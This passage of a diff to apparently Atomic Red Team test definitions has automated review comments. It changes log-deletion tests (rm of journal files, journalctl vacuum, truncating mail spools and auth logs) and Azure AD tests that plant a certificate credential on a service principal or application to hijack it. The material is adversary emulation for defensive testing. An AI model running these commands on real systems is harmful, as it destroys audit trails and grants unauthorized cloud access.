executor:
command: |
- osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
+ osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
name: sh
elevation_required: true
- name: Delete system journal logs via rm and journalctl utilities
@@ -152,9 +290,22 @@ atomic_tests:
The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
supported_platforms:
- linux
+ input_arguments:
+ journal_folder:
+ description: path to journal logs
+ type: string
+ default: /var/log/journal
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{journal_folder}
+ get_prereq_command: |
+ mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
executor:
command: |
- sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+ sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
@@ -169,7 +320,16 @@ atomic_tests:
description: Username of mail spool
type: string
default: root
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat /var/spool/mail/#{username}
+ get_prereq_command: |
+ touch /var/spool/mail/#{username}
executor:
+ elevation_required: true
command: |
echo 0> /var/spool/mail/#{username}
name: bash
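Review bot: `elevation_required: true` is inserted between `executor:` and `command:` here, whereas every other executor in this file (including the `log_path` test below) places it after `name:`; keeping the key order uniform makes the YAML easier to diff and review. The new prereq hard-codes `/var/spool/mail/#{username}`, which is consistent with the existing attack command, but some distributions keep spools under `/var/mail`; a note in the description would save confusion when `stat` fails there.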
@@ -188,3 +348,6 @@ atomic_tests:
command: |
echo 0> #{log_path}
name: bash
+ elevation_required: true
+ cleanup_command: |
+ if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi
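Review bot: The new `cleanup_command` deletes whatever `#{log_path}` points to whenever it is not the default, but the attack command only truncates the file (`echo 0> #{log_path}`) and no `get_prereq_command` creating it is visible in this hunk (the test body is above the hunk), so cleanup removes a file the test did not create — pointing `log_path` at a live log file would delete it. A cleanup should return the host to its prior state, not remove more; either drop the `rm -f` or restrict it to a file the test itself created under a known scratch path. The guard also compares against the literal `/var/log/secure` instead of the argument's default, so a changed default would silently lose its protection.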
diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md
index b1150539..1eb42e11 100644
--- a/atomics/T1098.001/T1098.001.md
+++ b/atomics/T1098.001/T1098.001.md
@@ -42,8 +42,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini
| username | Azure AD username | string | jonh@contoso.com|
| password | Azure AD password | string | p4sswd|
| service_principal_name | Name of the targeted service principal | string | SuperSP|
-| certificate_password | Password of the new certificate | string | Passw0rd|
-| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
#### Attack Commands: Run with `powershell`!
@@ -59,21 +57,18 @@ $sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Se
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
-$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
-$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
-Write-Host "Generated certificate ""$thumb"""
-$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
-Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
+$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
-$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
-$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
```
@@ -94,7 +89,6 @@ foreach ($cred in $credz) {
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
-rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
```
@@ -136,8 +130,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini
| username | Azure AD username | string | jonh@contoso.com|
| password | Azure AD password | string | p4sswd|
| application_name | Name of the targeted application | string | SuperApp|
-| certificate_password | Password of the new certificate | string | Passw0rd|
-| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
#### Attack Commands: Run with `powershell`!
@@ -153,21 +145,18 @@ $app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Objec
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
-$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
-$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
-Write-Host "Generated certificate ""$thumb"""
-$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
-Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
+$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
-$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
-$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
```
@@ -188,7 +177,6 @@ foreach ($cred in $credz) {
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
-rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
```
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml
index b203d66d..ff5c5d8d 100644
--- a/atomics/T1098.001/T1098.001.yaml
+++ b/atomics/T1098.001/T1098.001.yaml
@@ -22,14 +22,6 @@ atomic_tests:
description: Name of the targeted service principal
type: string
default: SuperSP
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: $env:TEMP
dependency_executor_name: powershell
dependencies:
- description: |
@@ -49,21 +41,18 @@ atomic_tests:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
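Review bot: With `Export-PfxCertificate` gone, `-KeyExportPolicy Exportable` on the `New-SelfSignedCertificate` call is no longer needed; `-KeyExportPolicy NonExportable` keeps the private key of this test credential from being lifted out of `Cert:\CurrentUser\My` during the window before cleanup runs, which fits the comment above about not leaving the backdoor open longer than necessary. Dropping the PFX and its `Passw0rd` default is a clear improvement, since nothing is written to disk any more. `$cert` is used unchecked on the next line; `New-SelfSignedCertificate` comes from the Windows PKI module and a failure would surface as a null-method error at `$cert.GetRawCertData()`, so a guard mirroring the `$sp` check (`if ($cert -eq $null) { Write-Warning "Certificate creation failed"; exit }`) would fail more clearly. The application-hijack variant at the end of this file makes the same change; its hunk runs past the end of this view.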
@@ -82,7 +71,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
- rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
@@ -107,14 +95,6 @@ atomic_tests:
description: Name of the targeted application
type: string
default: SuperApp
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: $env:TEMP
dependency_executor_name: powershell
dependencies:
- description: |
@@ -134,21 +114,18 @@ atomic_tests:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: |
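Review bot: The new `$cert = New-SelfSignedCertificate …` line keeps `-KeyExportPolicy Exportable`, yet the only step that needed an exportable key — the removed `Export-PfxCertificate` — is gone: `GetRawCertData()` reads only the public certificate, and `Connect-AzureAD -CertificateThumbprint $cert.Thumbprint` signs with the key in the CurrentUser store, so as far as this hunk shows nothing requires the private key to be exportable. Changing it to `-KeyExportPolicy NonExportable` follows the least-privilege intent of the expiry comment above it, so a leftover "AtomicCert" in the store (if the cleanup never runs) cannot have its private key pulled out. The same retained flag appears in the equivalent service-principal hunk earlier in this file, whose start is outside this view; it should change in both places. Since the removed PFX export also dropped the `certificate_password` and `path_to_cert` inputs, consider noting in the test description that the certificate now lives only in `Cert:\CurrentUser\My` and is removed by the cleanup command.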
@@ -166,7 +143,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
- rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key